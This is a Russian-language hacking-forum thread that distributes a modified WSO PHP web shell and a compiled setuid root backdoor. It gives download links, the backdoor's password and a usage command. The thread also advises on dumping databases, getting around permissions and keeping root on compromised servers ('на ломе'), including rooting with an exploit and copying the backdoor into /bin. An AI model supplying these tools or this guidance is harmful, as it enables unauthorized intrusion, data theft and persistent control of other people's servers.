WSO 2.5 Modified

Делал модификацию под себя, за основу взял последнюю версию WSO, и все же решил выложить, так как многим эта опция нужна.
Добавлена опция дампа определенных колонок таблиц.
Скриншот:


Код на pastebin.com: http://pastebin.com/WvZTc46s

 

В WSO из первого поста есть ошибка в параметрах:

Правьте)
Готовый запакованный вариант: http://pastebin.com/7fn3hebC

 

Может, это сойдёт?

PHP:

function DLE()
 {
...
 }
if(DLE())
 {
echo "ok";
 }
else{
echo "Fffuu";
}

 

Классный шелл!
Заливаю только этот шелл так как другие далеко позади!

 

Как сделать дамп БД через этот шелл?

 

как отредактировать .htaccess через wso ? нехватает прав как быть какие есть варианты обхода помогите

 

ссылка сдохла!
скиньте ещё раз Скомпилированный суидник плз!
и появилась ещё проблемка,после того как прописал всё суид,пасс,всё прошло,но когда нажал на YES,то сервер лёг сразу,не открывает не один сайт!
в чём может быть проблемма?

 

Самому не скомпилить чтоли?

1) Просто суидник: http://www.sendspace.com/file/hgwwez
2) Суидник собранный со -static: http://www.sendspace.com/file/gmeycj

Пасс на судник: 112s233

Использование: ./suid 112s233 'uname -a; id'

 

да уже скомпилил!
но вот следующий вопрос остаётся открытым!
после того как прописал всё суид,пасс,всё прошло,но когда нажал на YES,то сервер лёг сразу,не открывает не один сайт!
в чём может быть проблемма?
серв до сих пор лежит!

 

глючный какой-то мод, сохранил suid, теперь на шелл не заходит:

Query did not return anything

 

адрес пхп неверно указал

 

Друзья, объясните дураку смысл не root суидника ?

 

Говоря на твоём языке - когда запускаешь суидник, (если он правильно настроен и туда закачен..) то ты получаешь рут, например, открываешь консоль, пишешь whoami, а те сервак отвечает www, ты юзаешь суидник, /bin/suid затем смотришь whoami, - root

А суидник без рута просто не нужен, грубо говоря на то и суид - чтобы рута клепать)

 

Человеки добрые, подскажите в чём дело:
На ломе прекрасно открывается данный шел из этой темы, только не работают Actions.
Но не открывается вообще шел без модификации этой ( http://forum.antichat.ru/thread103155-wso.html ) пишет про ошибку:

"Parse error: syntax error, unexpected ')', expecting '(' in лом/wso2.php on line 595

 

Когда я запускаю суидник он выполняется под владельцем. Но так как я его сам и залил, то никакого рута не получить.

 

Стоит скоба там, где ее не должно стоять. А именно в 595 строке. Исправь

 

В том то и дело, что всё в файле норм. Качаю прямо из топика автора, переименовываю, исправляю хеш пароля, заливаю на лом. Больше никаких исправлений не делаю

 

Простым смертным юзерам, www к примеру, не залить суидник в /bin/ т.к эта папка запрещена на запись, и нужно для начала сплойтом рутануть сервак, из под консоли (или сделать права), копирнуть суидник в /bin/ и затем запускать его чтобы получить рут, то есть чтобы не юзать каждый раз сплоит...

 

Так ты что хочешь то? Именно чтоб суидник работал под нужным тебе юзверем(ftp например), а не под веб-сервером? В таком случае нужно в коде суидника прописать uid и guid юзверя, а не рута(0). Можно еще настроить php как cgi/fcgi - тогда все скрипты будут работать от того же юзера, что и владелец файлов(обычно тот же, что и ftp и ssh твоего аккаунта).

 

Зачем его заливать в bin ?